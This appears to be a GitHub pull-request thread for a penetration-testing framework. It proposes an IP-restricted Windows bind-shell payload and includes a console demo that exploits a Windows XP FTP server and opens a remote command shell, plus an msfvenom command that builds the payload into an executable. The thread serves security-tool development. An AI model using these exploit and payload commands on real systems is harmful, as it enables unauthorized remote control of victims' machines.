added ACL Bind Shell payload #2981

wants to merge 1 commit into


None yet

5 participants


Single tcp bind shell with ACL support (only the IP you set will get the shell). It's just an alternative to the classic bind shell. I think it could be useful if you do not want someone else to steal your shell with a simple netcat. I used the shell_bind_tcp of Stephen Fewer and I modified the accept() call to check the client IP ( this is an increase of 22 bytes.). If the IP is not the one defined in AHOST (Allowed IP) the descriptor is closed and the socket waits for another connection.

I add .asm files, the payload and the respective handler (I used the bind shell handler with a couple of modifications). Let me know other changes needed.

OJ commented Feb 12, 2014

This looks cool! Do you happen to have sample output/demo usage?



@OJ Thank you.
You only have to use the AHOST to specify the IP allowed to get the shell (Others will be rejected) Ej:

msf> use exploit/windows/ftp/pcman_stor
msf exploit(pcman_stor) > set rhost
rhost =>
msf exploit(pcman_stor) > set payload windows/shell_acl_bind_tcp
payload => windows/shell_acl_bind_tcp
msf exploit(pcman_stor) > set lport 5041
lport => 5041
msf exploit(pcman_stor) > ifconfig | grep 192
[*] exec: ifconfig | grep 192

          inet addr:  Bcast:  Mask:
msf exploit(pcman_stor) > set ahost
ahost =>
msf exploit(pcman_stor) > exploit

[*] Connecting to FTP server
[*] Started ACL bind handler
[*] Connected to target FTP server.
[*] Authenticating as anonymous with password
[*] Sending password...
[*] Trying victim Windows XP SP3 English...
[*] Command shell session 1 opened ( -> at 2014-02-12 04:49:35 +0100

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Test\My Documents\Downloads>

Example with msfvenom:

./msfvenom -p windows/shell_acl_bind_tcp AHOST= LPORT=1009 -f exe  > batman.exe

In this case, only will get the shell

Edit by OJ: Added code format tags


I am sad that @BorjaMerino didn't make a cool video with awesome music this time. Perhaps next time. :P


@wvu-r7 xDD Who said that? Stay tuned


I love your YouTube videos! :D


Since single (#3017) and starger (#3394) bind shell approach is an improved version of this shellcode feel free to refuse this pull request.


Closing in favour of #3017 then

@Meatballs1 Meatballs1 closed this Jun 7, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment